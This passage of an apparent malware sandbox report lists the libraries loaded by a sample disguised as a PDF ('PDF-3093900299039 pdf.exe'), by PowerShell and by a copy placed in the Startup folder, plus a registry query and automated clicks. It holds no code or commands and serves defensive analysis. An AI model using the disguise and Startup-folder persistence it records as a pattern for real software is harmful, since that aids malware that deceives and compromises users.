            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: rasapi32.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: rasman.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: rtutils.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: secur32.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: textshaping.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: dwrite.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: OK
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
